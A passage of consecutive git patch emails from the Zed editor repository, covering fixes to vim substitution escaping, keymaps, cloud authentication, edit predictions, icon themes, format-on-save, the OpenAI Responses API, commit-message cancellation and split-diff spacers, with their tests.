Rust regex capture-group reference. pub(crate) fn parse(mut chars: Peekable) -> Option { let delimiter = chars .next() @@ -692,6 +694,9 @@ impl Replacement { escaped = false; if phase == 1 && c.is_ascii_digit() { buffer.push('$') + } else if phase == 1 && c == '$' { + // Second '$' escapes by fallthrough + buffer.push('$') // unescape escaped parens } else if phase == 0 && (c == '(' || c == ')') { } else if c != delimiter { @@ -714,6 +719,10 @@ impl Replacement { // escape unescaped parens if phase == 0 && (c == '(' || c == ')') { buffer.push('\\') + } else if phase == 1 && c == '$' { + // '$' is not special in the replacement clause, + // so we also escape here. + buffer.push('$') } buffer.push(c) } @@ -757,6 +766,16 @@ mod test { use search::BufferSearchBar; use settings::SettingsStore; + #[test] + fn test_replacement_parse_escaped_dollar() { + let parsed = super::Replacement::parse(r"/\$test/\$rest/g".chars().peekable()) + .expect("parse should succeed"); + + assert_eq!(parsed.search, r"\$test"); + assert_eq!(parsed.replacement, "$$rest"); + assert!(parsed.flag_g); + } + #[gpui::test] async fn test_move_to_next(cx: &mut gpui::TestAppContext) { let mut cx = VimTestContext::new(cx, true).await; @@ -1182,6 +1201,27 @@ mod test { }) } + #[gpui::test] + async fn test_replace_literal_dollar(cx: &mut gpui::TestAppContext) { + let mut cx = NeovimBackedTestContext::new(cx).await; + cx.set_shared_state(indoc! { + "ˇBase=hello + echo $Base" + }) + .await; + + cx.simulate_shared_keystrokes( + ": % s / \\ $ shift-b a s e / \\ $ shift-b a s e shift-n e w / g", + ) + .await; + cx.simulate_shared_keystrokes("enter").await; + + cx.shared_state().await.assert_eq(indoc! { + "Base=hello + ˇecho $BaseNew" + }); + } + #[gpui::test] async fn test_replace_g(cx: &mut gpui::TestAppContext) { let mut cx = NeovimBackedTestContext::new(cx).await; diff --git a/crates/vim/test_data/test_replace_literal_dollar.json b/crates/vim/test_data/test_replace_literal_dollar.json new file mode 100644 index 00000000000000..b5f97f9505c869 --- /dev/null +++ b/crates/vim/test_data/test_replace_literal_dollar.json @@ -0,0 +1,25 @@ +{"Put":{"state":"ˇBase=hello\necho $Base"}} +{"Key":":"} +{"Key":"%"} +{"Key":"s"} +{"Key":"/"} +{"Key":"\\"} +{"Key":"$"} +{"Key":"shift-b"} +{"Key":"a"} +{"Key":"s"} +{"Key":"e"} +{"Key":"/"} +{"Key":"\\"} +{"Key":"$"} +{"Key":"shift-b"} +{"Key":"a"} +{"Key":"s"} +{"Key":"e"} +{"Key":"shift-n"} +{"Key":"e"} +{"Key":"w"} +{"Key":"/"} +{"Key":"g"} +{"Key":"enter"} +{"Get":{"state":"Base=hello\nˇecho $BaseNew","mode":"Normal"}} From d60396bb85ec2c6668b4bcd4ca4725309cd9af9b Mon Sep 17 00:00:00 2001 From: Jakub Profota Date: Mon, 27 Apr 2026 10:55:04 +0200 Subject: [PATCH 045/231] Enable Vim/Helix keybindings when the base keymap is set to None (#54899) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Hi! 👋 When `base_keymap` is set to `None`, it disables all the keybindings, even if `vim_mode` or `helix_mode` is enabled. However, I think the Vim/Helix keybindings should be applied on top of the empty base keymap. My use case for this is to start with the minimal set of Vim/Helix key shortcuts and add other bindings on top of that, instead of flooding the keymap with hundreds of predefined shortcuts from some base keymap. --- crates/zed/src/zed.rs | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index 6d1a9c176f1193..2b1ff93581c20e 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -2074,16 +2074,16 @@ fn reload_keymaps(cx: &mut App, mut user_key_bindings: Vec) { pub fn load_default_keymap(cx: &mut App) { let base_keymap = *BaseKeymap::get_global(cx); - if base_keymap == BaseKeymap::None { - return; - } - - cx.bind_keys( - KeymapFile::load_asset(DEFAULT_KEYMAP_PATH, Some(KeybindSource::Default), cx).unwrap(), - ); + if base_keymap != BaseKeymap::None { + cx.bind_keys( + KeymapFile::load_asset(DEFAULT_KEYMAP_PATH, Some(KeybindSource::Default), cx).unwrap(), + ); - if let Some(asset_path) = base_keymap.asset_path() { - cx.bind_keys(KeymapFile::load_asset(asset_path, Some(KeybindSource::Base), cx).unwrap()); + if let Some(asset_path) = base_keymap.asset_path() { + cx.bind_keys( + KeymapFile::load_asset(asset_path, Some(KeybindSource::Base), cx).unwrap(), + ); + } } if VimModeSetting::get_global(cx).0 || vim_mode_setting::HelixModeSetting::get_global(cx).0 { From bfd4118af38e23f9c0ac584cd6450c5d964380c8 Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Mon, 27 Apr 2026 04:59:36 -0400 Subject: [PATCH 046/231] language_models: Fix `is_authenticated` state for Cloud provider (#54826) This PR fixes an issue introduced in https://github.com/zed-industries/zed/pull/54397 where the Zed Cloud provider would not be reflected as "authenticated" if a connection to Collab was attempted, but could not be established. This was especially noticable when running Zed against a local version of Cloud and not having Collab running. This restores the original logic prior to that change. Release Notes: - N/A --- crates/language_models/src/provider/cloud.rs | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/crates/language_models/src/provider/cloud.rs b/crates/language_models/src/provider/cloud.rs index 8a5059d63b0420..1c4de9e1afa4d8 100644 --- a/crates/language_models/src/provider/cloud.rs +++ b/crates/language_models/src/provider/cloud.rs @@ -1,6 +1,5 @@ use ai_onboarding::YoungAccountBanner; use anyhow::Result; -use client::Status; use client::{Client, RefreshLlmTokenListener, UserStore, global_llm_token, zed_urls}; use cloud_api_client::LlmApiToken; use cloud_api_types::OrganizationId; @@ -250,8 +249,7 @@ impl LanguageModelProvider for CloudLanguageModelProvider { fn is_authenticated(&self, cx: &App) -> bool { let state = self.state.read(cx); - let status = *state.client.status().borrow(); - matches!(status, Status::Authenticated | Status::Connected { .. }) + !state.is_signed_out(cx) } fn authenticate(&self, cx: &mut App) -> Task> { From 332b226a3c277aae04190f11b7a5a34902a62370 Mon Sep 17 00:00:00 2001 From: Saketh <126517689+SAKETH11111@users.noreply.github.com> Date: Mon, 27 Apr 2026 04:27:26 -0500 Subject: [PATCH 047/231] terminal: Bind Alt+F4 to Close Window in the terminal keymap (#53091) Closes #52774 ## Summary - Bind Windows `Alt+F4` to `workspace::CloseWindow` in the `Terminal` keymap context - Add a regression test covering the built-in Windows terminal keymap entry ## Why When the integrated terminal is focused, `Alt+F4` should close the window instead of falling through to terminal keystroke handling. Handling this in the Windows `Terminal` keymap keeps the fix aligned with the rest of the terminal shortcut overrides. ## Validation - `cargo test -p settings windows_terminal_keymap_closes_window_on_alt_f4` Release Notes: - Fixed Alt+F4 on Windows so Zed closes even when the integrated terminal is focused. --------- Co-authored-by: Jakub Konka --- assets/keymaps/default-windows.json | 1 + 1 file changed, 1 insertion(+) diff --git a/assets/keymaps/default-windows.json b/assets/keymaps/default-windows.json index 8651bfbe3b4b93..8d60a68dbc26b6 100644 --- a/assets/keymaps/default-windows.json +++ b/assets/keymaps/default-windows.json @@ -1226,6 +1226,7 @@ "ctrl-delete": ["terminal::SendText", "\u001bd"], "ctrl-n": "workspace::NewTerminal", // Overrides for conflicting keybindings + "alt-f4": "workspace::CloseWindow", "ctrl-b": ["terminal::SendKeystroke", "ctrl-b"], "ctrl-c": ["terminal::SendKeystroke", "ctrl-c"], "ctrl-e": ["terminal::SendKeystroke", "ctrl-e"], From f503aeaaeb3e76f405757d22f1f5e7d18d9d79b1 Mon Sep 17 00:00:00 2001 From: Rocky Shi Date: Mon, 27 Apr 2026 21:31:45 +1200 Subject: [PATCH 048/231] Enable edit prediction and Copilot for untitled buffers (#45764) Closes [#45631](https://github.com/zed-industries/zed/issues/45631) Recording: https://github.com/user-attachments/assets/a5143eb4-fae3-42a7-9d64-fb7c42ee97c2 Release Notes: - copilot: Edit predictions now work in temporary files --------- Co-authored-by: Piotr Osiewicz <24362066+osiewicz@users.noreply.github.com> --- crates/edit_prediction/src/edit_prediction.rs | 2 +- .../src/edit_prediction_tests.rs | 22 +++++++++++++++++++ crates/edit_prediction/src/zeta.rs | 7 ++---- .../zed/src/zed/edit_prediction_registry.rs | 4 +--- 4 files changed, 26 insertions(+), 9 deletions(-) diff --git a/crates/edit_prediction/src/edit_prediction.rs b/crates/edit_prediction/src/edit_prediction.rs index c156e694666e90..f43b94212c0699 100644 --- a/crates/edit_prediction/src/edit_prediction.rs +++ b/crates/edit_prediction/src/edit_prediction.rs @@ -725,7 +725,7 @@ fn compute_diff_between_snapshots_in_range( Some((diff, new_start_point..new_end_point)) } -fn buffer_path_with_id_fallback( +pub(crate) fn buffer_path_with_id_fallback( file: Option<&Arc>, snapshot: &TextBufferSnapshot, cx: &App, diff --git a/crates/edit_prediction/src/edit_prediction_tests.rs b/crates/edit_prediction/src/edit_prediction_tests.rs index 8869e1c3f3a52b..6cc38a875e19cf 100644 --- a/crates/edit_prediction/src/edit_prediction_tests.rs +++ b/crates/edit_prediction/src/edit_prediction_tests.rs @@ -3417,6 +3417,28 @@ async fn test_edit_prediction_settled(cx: &mut TestAppContext) { } } +#[gpui::test] +fn test_buffer_path_with_id_fallback_for_untitled_buffers(cx: &mut TestAppContext) { + let buffer_1 = cx.new(|cx| Buffer::local("one", cx)); + let buffer_2 = cx.new(|cx| Buffer::local("two", cx)); + + let snapshot_1 = buffer_1.read_with(cx, |buffer, _| buffer.text_snapshot()); + let snapshot_2 = buffer_2.read_with(cx, |buffer, _| buffer.text_snapshot()); + + let path_1 = cx.read(|cx| buffer_path_with_id_fallback(None, &snapshot_1, cx)); + let path_2 = cx.read(|cx| buffer_path_with_id_fallback(None, &snapshot_2, cx)); + + assert_eq!( + path_1.as_ref(), + Path::new(&format!("untitled-{}", snapshot_1.remote_id())) + ); + assert_eq!( + path_2.as_ref(), + Path::new(&format!("untitled-{}", snapshot_2.remote_id())) + ); + assert_ne!(path_1.as_ref(), path_2.as_ref()); +} + #[gpui::test] async fn test_data_collection_disabled_by_default(cx: &mut TestAppContext) { let (ep_store, _channels) = init_test_with_fake_client(cx); diff --git a/crates/edit_prediction/src/zeta.rs b/crates/edit_prediction/src/zeta.rs index 7b12453353478d..6a287847fd2b0e 100644 --- a/crates/edit_prediction/src/zeta.rs +++ b/crates/edit_prediction/src/zeta.rs @@ -1,7 +1,7 @@ use crate::{ CurrentEditPrediction, DebugEvent, EditPredictionFinishedDebugEvent, EditPredictionId, EditPredictionModelInput, EditPredictionStartedDebugEvent, EditPredictionStore, StoredEvent, - ZedUpdateRequiredError, + ZedUpdateRequiredError, buffer_path_with_id_fallback, cursor_excerpt::{self, compute_cursor_excerpt, compute_syntax_ranges}, prediction::EditPredictionResult, }; @@ -70,10 +70,7 @@ pub fn request_prediction_with_zeta( let preferred_experiment = store.preferred_experiment().map(|s| s.to_owned()); let open_ai_compatible_api_key = load_open_ai_compatible_api_key_if_needed(provider, cx); - let excerpt_path: Arc = snapshot - .file() - .map(|file| -> Arc { file.full_path(cx).into() }) - .unwrap_or_else(|| Arc::from(Path::new("untitled"))); + let excerpt_path = buffer_path_with_id_fallback(snapshot.file(), &snapshot.text, cx); let repo_url = if can_collect_data { let buffer_id = buffer.read(cx).remote_id(); diff --git a/crates/zed/src/zed/edit_prediction_registry.rs b/crates/zed/src/zed/edit_prediction_registry.rs index e1245615542753..ad394cc5e760b6 100644 --- a/crates/zed/src/zed/edit_prediction_registry.rs +++ b/crates/zed/src/zed/edit_prediction_registry.rs @@ -258,9 +258,7 @@ fn assign_edit_prediction_provider( ep_store.update(cx, |this, cx| this.start_copilot_for_project(&project, cx)); if let Some(copilot) = copilot { - if let Some(buffer) = singleton_buffer - && buffer.read(cx).file().is_some() - { + if let Some(buffer) = singleton_buffer { copilot.update(cx, |copilot, cx| { copilot.register_buffer(&buffer, cx); }); From f0d23538575af7b92fdfe2762af89d4536c9278d Mon Sep 17 00:00:00 2001 From: galuis116 <116897328+galuis116@users.noreply.github.com> Date: Mon, 27 Apr 2026 02:32:43 -0700 Subject: [PATCH 049/231] settings_ui: Fix switching icon themes from "dynamic" to "static" always selecting the dark theme (#54647) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54646 Release Notes: - Fixed settings behavior where switching Icon Theme from "Dynamic" (System mode) to "Static" now selects the icon theme that matches the current OS appearance (light or dark), instead of always defaulting to the dark variant. --------- Co-authored-by: Marshall Bowers --- crates/settings_ui/src/page_data.rs | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/crates/settings_ui/src/page_data.rs b/crates/settings_ui/src/page_data.rs index 5b43d0a18426bd..99dd77b84aebb4 100644 --- a/crates/settings_ui/src/page_data.rs +++ b/crates/settings_ui/src/page_data.rs @@ -622,7 +622,7 @@ fn appearance_page() -> SettingsPage { .as_ref()? .discriminant() as usize]) }, - write: |settings_content, value, _| { + write: |settings_content, value, app| { let Some(value) = value else { settings_content.theme.icon_theme = None; return; @@ -638,7 +638,13 @@ fn appearance_page() -> SettingsPage { match mode { theme_settings::ThemeAppearanceMode::Light => light.clone(), theme_settings::ThemeAppearanceMode::Dark => dark.clone(), - theme_settings::ThemeAppearanceMode::System => dark.clone(), // no cx, can't determine correct choice + theme_settings::ThemeAppearanceMode::System => { + if SystemAppearance::global(app).is_light() { + light.clone() + } else { + dark.clone() + } + } } }, }; From aeb72439d89b3efc1eef88aa37af80e39d6e351d Mon Sep 17 00:00:00 2001 From: Bruna Fernandes <118817701+Bruna-MF@users.noreply.github.com> Date: Mon, 27 Apr 2026 10:33:44 +0100 Subject: [PATCH 050/231] pane: Fix apply formatting when new file is first created (#52692) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ### Description: Previously, formatting was only applied after manually saving the file, once it had already been created and saved. After the fix, when creating a new file from the editor and saving it for the first time with a filename, formatting is automatically applied if “format on save” is enabled. ### Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [X] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Closes #22534 Release Notes: - Fixed apply formatting when a new file is first created --- crates/workspace/src/pane.rs | 86 ++++++++++++++++++++++++++++++- crates/workspace/src/workspace.rs | 2 +- 2 files changed, 86 insertions(+), 2 deletions(-) diff --git a/crates/workspace/src/pane.rs b/crates/workspace/src/pane.rs index de707c8eb17f11..aa6e53ef666348 100644 --- a/crates/workspace/src/pane.rs +++ b/crates/workspace/src/pane.rs @@ -2486,13 +2486,29 @@ impl Pane { pane.remove_item(item.item_id(), false, false, window, cx); } - item.save_as(project, new_path, window, cx) + item.save_as(project.clone(), new_path, window, cx) })? } else { return Ok(false); }; save_task.await?; + if should_format { + pane.update_in(cx, |pane, window, cx| { + pane.unpreview_item_if_preview(item.item_id()); + item.save( + SaveOptions { + format: true, + autosave: false, + force_format, + }, + project, + window, + cx, + ) + })? + .await?; + } return Ok(true); } } @@ -8025,6 +8041,74 @@ mod tests { }); } + #[gpui::test] + async fn test_format_runs_on_first_save_of_new_file(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + let item = add_labeled_item(&pane, "untitled", true, cx); + item.update(cx, |item, cx| { + item.project_items.push(TestProjectItem::new_untitled(cx)); + }); + assert_item_labels(&pane, ["untitled*^"], cx); + + let close_task = pane.update_in(cx, |pane, window, cx| { + pane.close_item_by_id(item.item_id(), SaveIntent::Save, window, cx) + }); + + cx.executor().run_until_parked(); + cx.simulate_new_path_selection(|_| Some(Default::default())); + close_task.await.unwrap(); + + item.read_with(cx, |item, _| { + assert_eq!(item.save_as_count, 1); + assert_eq!( + item.save_count, 1, + "formatter should run after the file is given a path on first save" + ); + }); + } + + #[gpui::test] + async fn test_format_does_not_run_on_first_save_when_save_without_format( + cx: &mut TestAppContext, + ) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + let item = add_labeled_item(&pane, "untitled", true, cx); + item.update(cx, |item, cx| { + item.project_items.push(TestProjectItem::new_untitled(cx)); + }); + assert_item_labels(&pane, ["untitled*^"], cx); + + let close_task = pane.update_in(cx, |pane, window, cx| { + pane.close_item_by_id(item.item_id(), SaveIntent::SaveWithoutFormat, window, cx) + }); + + cx.executor().run_until_parked(); + cx.simulate_new_path_selection(|_| Some(Default::default())); + close_task.await.unwrap(); + + item.read_with(cx, |item, _| { + assert_eq!(item.save_as_count, 1); + assert_eq!( + item.save_count, 0, + "formatter should not run when SaveWithoutFormat is used" + ); + }); + } + #[gpui::test] async fn test_discard_does_not_reload_multibuffer(cx: &mut TestAppContext) { init_test(cx); diff --git a/crates/workspace/src/workspace.rs b/crates/workspace/src/workspace.rs index 8b54a995a87e07..b0c5d3cb97df50 100644 --- a/crates/workspace/src/workspace.rs +++ b/crates/workspace/src/workspace.rs @@ -11521,7 +11521,7 @@ mod tests { // The requested items are closed. pane.update(cx, |pane, cx| { - assert_eq!(item4.read(cx).save_count, 0); + assert_eq!(item4.read(cx).save_count, 1); assert_eq!(item4.read(cx).save_as_count, 1); assert_eq!(item4.read(cx).reload_count, 0); assert_eq!(pane.items_len(), 1); From 3ef140cb4e5ac04b2d019ef9826ad92c4762de54 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 27 Apr 2026 11:52:51 +0200 Subject: [PATCH 051/231] open_ai: Use responses API for all models (#54910) From the [docs](https://developers.openai.com/api/docs/guides/migrate-to-responses#responses-benefits): > Better performance: Using reasoning models, like GPT-5, with Responses will result in better model intelligence when compared to Chat Completions. Our internal evals reveal a 3% improvement in SWE-bench with same prompt and setup. Agentic by default: The Responses API is an agentic loop, allowing the model to call multiple tools, like web_search, image_generation, file_search, code_interpreter, remote MCP servers, as well as your own custom functions, within the span of one API request. Lower costs: Results in lower costs due to improved cache utilization (40% to 80% improvement when compared to Chat Completions in internal tests). Stateful context: Use store: true to maintain state from turn to turn, preserving reasoning and tool context from turn-to-turn. Flexible inputs: Pass a string with input or a list of messages; use instructions for system-level guidance. Encrypted reasoning: Opt-out of statefulness while still benefiting from advanced reasoning. Future-proof: Future-proofed for upcoming models. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - Always use Responses API for OpenAI models --- crates/language_models/src/provider/open_ai.rs | 16 ++++++++-------- crates/open_ai/src/open_ai.rs | 9 ++------- 2 files changed, 10 insertions(+), 15 deletions(-) diff --git a/crates/language_models/src/provider/open_ai.rs b/crates/language_models/src/provider/open_ai.rs index c018a8da424fd2..5557ce2d047887 100644 --- a/crates/language_models/src/provider/open_ai.rs +++ b/crates/language_models/src/provider/open_ai.rs @@ -384,34 +384,34 @@ impl LanguageModel for OpenAiLanguageModel { LanguageModelCompletionError, >, > { - if self.model.supports_chat_completions() { - let request = into_open_ai( + if self.model.uses_responses_api() { + let request = into_open_ai_response( request, self.model.id(), self.model.supports_parallel_tool_calls(), self.model.supports_prompt_cache_key(), self.max_output_tokens(), self.model.reasoning_effort(), - false, ); - let completions = self.stream_completion(request, cx); + let completions = self.stream_response(request, cx); async move { - let mapper = OpenAiEventMapper::new(); + let mapper = OpenAiResponseEventMapper::new(); Ok(mapper.map_stream(completions.await?).boxed()) } .boxed() } else { - let request = into_open_ai_response( + let request = into_open_ai( request, self.model.id(), self.model.supports_parallel_tool_calls(), self.model.supports_prompt_cache_key(), self.max_output_tokens(), self.model.reasoning_effort(), + false, ); - let completions = self.stream_response(request, cx); + let completions = self.stream_completion(request, cx); async move { - let mapper = OpenAiResponseEventMapper::new(); + let mapper = OpenAiEventMapper::new(); Ok(mapper.map_stream(completions.await?).boxed()) } .boxed() diff --git a/crates/open_ai/src/open_ai.rs b/crates/open_ai/src/open_ai.rs index e555235b993fd3..5d313272548477 100644 --- a/crates/open_ai/src/open_ai.rs +++ b/crates/open_ai/src/open_ai.rs @@ -272,17 +272,12 @@ impl Model { } } - pub fn supports_chat_completions(&self) -> bool { + pub fn uses_responses_api(&self) -> bool { match self { Self::Custom { supports_chat_completions, .. - } => *supports_chat_completions, - Self::FiveCodex - | Self::FivePointTwoCodex - | Self::FivePointThreeCodex - | Self::FivePointFourPro - | Self::FivePointFivePro => false, + } => !*supports_chat_completions, _ => true, } } From c8650d44b77fd1c17a759ec92dfc4382da714cda Mon Sep 17 00:00:00 2001 From: Austin Cummings Date: Mon, 27 Apr 2026 02:54:48 -0700 Subject: [PATCH 052/231] git_ui: Replace commit message generation spinner with a cancel button (#49540) When a model produces poor output during commit message generation, there was no way to cancel it. This replaces the non-interactive spinner with a Stop button that cancels the generation task. Partial generated text is kept in the editor. Partially addresses #33556 2026-02-18-160103_hyprshot --- Before you mark this PR as ready for review, make sure that you have: - [x] Added a solid test coverage and/or screenshots from doing manual testing - [x] Done a self-review taking into account security and performance aspects - [x] Aligned any UI changes with the [UI checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) Release Notes: - Added a button to stop commit message generation in the git panel --------- Co-authored-by: Danilo Leal Co-authored-by: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> --- crates/git_ui/src/git_panel.rs | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index 1e53c1cf53e315..62f8edcfbd87fc 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -71,8 +71,8 @@ use strum::{IntoEnumIterator, VariantNames}; use theme_settings::ThemeSettings; use time::OffsetDateTime; use ui::{ - ButtonLike, Checkbox, CommonAnimationExt, ContextMenu, ElevationIndex, IndentGuideColors, - PopoverMenu, RenderedIndentGuide, ScrollAxes, Scrollbars, SplitButton, Tooltip, WithScrollbar, + ButtonLike, Checkbox, ContextMenu, ElevationIndex, IndentGuideColors, PopoverMenu, + RenderedIndentGuide, ScrollAxes, Scrollbars, SplitButton, TintColor, Tooltip, WithScrollbar, prelude::*, }; use util::paths::PathStyle; @@ -4063,10 +4063,15 @@ impl GitPanel { h_flex() .gap_1() .child( - Icon::new(IconName::ArrowCircle) - .size(IconSize::XSmall) - .color(Color::Info) - .with_rotate_animation(2), + IconButton::new("cancel-generate-commit-message", IconName::Stop) + .icon_color(Color::Error) + .icon_size(IconSize::Small) + .style(ButtonStyle::Tinted(TintColor::Error)) + .tooltip(Tooltip::text("Cancel Commit Message Generation")) + .on_click(cx.listener(|this, _event, _window, cx| { + this.generate_commit_message_task.take(); + cx.notify(); + })), ) .child( Label::new("Generating Commit…") From 4e511094c0a3f39e9b1a01736eac1bd88fb30a38 Mon Sep 17 00:00:00 2001 From: Tim Vermeulen Date: Mon, 27 Apr 2026 12:10:48 +0200 Subject: [PATCH 053/231] editor: Fix split diff spacer calculation for non-row-aligned patch groups (#53098) Fixes a bug in the split diff spacer calculation when a patch group starts mid-row, sometimes causing extra spacers to be inserted. `spacer_blocks` already explicitly handles the case where `first_point` isn't at the start of `edit_for_first_point.old`, but the `while let Some(source_point) = source_points.next()` loop that follows implicitly assumes that `source_point` is at the start of `current_range`, which in turn seems to be based on the assumption that `current_range` starts at the beginning of a row. As it turns out, `current_range` isn't guaranteed to start at the beginning of a row, which can sometimes lead to incorrect spacer blocks being inserted. This addresses that by moving the existing `if edit_for_first_point.old.start < first_point` logic into the loop body as `if current_edit.old.start < current_boundary` in order to handle any non-row-aligned patch groups, not just the first one. Here's an example of how this bug could manifest: https://github.com/user-attachments/assets/1d3a5b4c-e4ad-4d87-804b-c4390d25f408 After: https://github.com/user-attachments/assets/b15acc62-33fe-4154-82e5-5cdf1806ffa7 Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed incorrect spacer blocks sometimes appearing in the split diff view when editing the file. --- crates/editor/src/display_map/block_map.rs | 71 +++++++------ crates/editor/src/split.rs | 115 +++++++++++++++++++++ 2 files changed, 150 insertions(+), 36 deletions(-) diff --git a/crates/editor/src/display_map/block_map.rs b/crates/editor/src/display_map/block_map.rs index 45469ab6cf1fea..c3dbfa4f6dd6d8 100644 --- a/crates/editor/src/display_map/block_map.rs +++ b/crates/editor/src/display_map/block_map.rs @@ -1368,50 +1368,49 @@ impl BlockMap { let mut delta = their_baseline.0 as i32 - our_baseline.0 as i32; - // If we started out in the middle of a hunk/group, work up to the end of that group to set up the main loop below. - if edit_for_first_point.old.start < first_point { - let mut current_boundary = first_point; - let current_range = edit_for_first_point.new; - while let Some(next_point) = source_points.peek().cloned() { - let edit_for_next_point = excerpt.patch.edit_for_old_position(next_point); - if edit_for_next_point.new.end > current_range.end { - break; - } - source_points.next(); - current_boundary = next_point; - } - - let (new_delta, spacer) = determine_spacer( - &mut our_wrapper, - &mut companion_wrapper, - current_boundary, - current_range.end.min(excerpt.target_excerpt_range.end), - delta, - Bias::Left, - ); - - delta = new_delta; - if let Some((wrap_row, height)) = spacer { - result.push(( - BlockPlacement::Above(wrap_row), - Block::Spacer { - id: SpacerId(self.next_block_id.fetch_add(1, SeqCst)), - height, - is_below: false, - }, - )); - } - } - while let Some(source_point) = source_points.next() { let mut current_boundary = source_point; - let current_range = excerpt.patch.edit_for_old_position(current_boundary).new; + let current_edit = excerpt.patch.edit_for_old_position(current_boundary); + let current_range = current_edit.new; if current_boundary.column > 0 { debug_assert_eq!(current_boundary, excerpt.source_excerpt_range.end); break; } + if current_edit.old.start < current_boundary { + while let Some(next_point) = source_points.peek().copied() { + let edit_for_next_point = excerpt.patch.edit_for_old_position(next_point); + if edit_for_next_point.new.end > current_range.end { + break; + } + current_boundary = next_point; + source_points.next(); + } + + let (new_delta, spacer) = determine_spacer( + &mut our_wrapper, + &mut companion_wrapper, + current_boundary, + current_range.end.min(excerpt.target_excerpt_range.end), + delta, + Bias::Left, + ); + + delta = new_delta; + if let Some((wrap_row, height)) = spacer { + result.push(( + BlockPlacement::Above(wrap_row), + Block::Spacer { + id: SpacerId(self.next_block_id.fetch_add(1, SeqCst)), + height, + is_below: false, + }, + )); + } + continue; + } + let (delta_at_start, mut spacer_at_start) = determine_spacer( &mut our_wrapper, &mut companion_wrapper, diff --git a/crates/editor/src/split.rs b/crates/editor/src/split.rs index 347383d0171b8d..42f485a236b40c 100644 --- a/crates/editor/src/split.rs +++ b/crates/editor/src/split.rs @@ -6062,6 +6062,121 @@ mod tests { cx.run_until_parked(); } + #[gpui::test] + async fn test_spacer_blocks_revert_after_temporary_edit(cx: &mut gpui::TestAppContext) { + use rope::Point; + use unindent::Unindent as _; + + let (editor, mut cx) = init_test(cx, SoftWrap::EditorWidth, DiffViewStyle::Split).await; + + let base_text = " + aaa + bbb + " + .unindent(); + let current_text = " + aaa + bbb + ccc + " + .unindent(); + + let (buffer, diff) = buffer_with_diff(&base_text, ¤t_text, &mut cx); + + editor.update(cx, |editor, cx| { + let path = PathKey::for_buffer(&buffer, cx); + editor.update_excerpts_for_path( + path, + buffer.clone(), + vec![Point::new(0, 0)..buffer.read(cx).max_point()], + 0, + diff.clone(), + cx, + ); + }); + + cx.run_until_parked(); + + assert_split_content( + &editor, + " + § + § ----- + aaa + bbb + ccc" + .unindent(), + " + § + § ----- + aaa + bbb + § spacer" + .unindent(), + &mut cx, + ); + + let buffer_snapshot = buffer.update(cx, |buffer, cx| { + buffer.edit([(Point::new(0, 3)..Point::new(0, 3), "\n")], None, cx); + buffer.text_snapshot() + }); + diff.update(cx, |diff, cx| { + diff.recalculate_diff_sync(&buffer_snapshot, cx); + }); + + cx.run_until_parked(); + + assert_split_content( + &editor, + " + § + § ----- + aaa + + bbb + ccc" + .unindent(), + " + § + § ----- + aaa + § spacer + bbb + § spacer" + .unindent(), + &mut cx, + ); + + let buffer_snapshot = buffer.update(cx, |buffer, cx| { + buffer.edit([(Point::new(0, 3)..Point::new(1, 0), "")], None, cx); + buffer.text_snapshot() + }); + diff.update(cx, |diff, cx| { + diff.recalculate_diff_sync(&buffer_snapshot, cx); + }); + + cx.run_until_parked(); + + assert_split_content( + &editor, + " + § + § ----- + aaa + bbb + ccc" + .unindent(), + " + § + § ----- + aaa + bbb + § spacer" + .unindent(), + &mut cx, + ); + } + #[gpui::test] async fn test_act_as_type(cx: &mut gpui::TestAppContext) { let (splittable_editor, cx) = init_test(cx, SoftWrap::None, DiffViewStyle::Split).await; From 5b9125dd3d91200e73c324a7cc9d572366100540 Mon Sep 17 00:00:00 2001 From: Tristan Phease Date: Mon, 27 Apr 2026 23:10:58 +1200 Subject: [PATCH 054/231] Fix ESLint not starting on Windows (#54945) Self-Review Checklist: - [x] I've reviewed my own 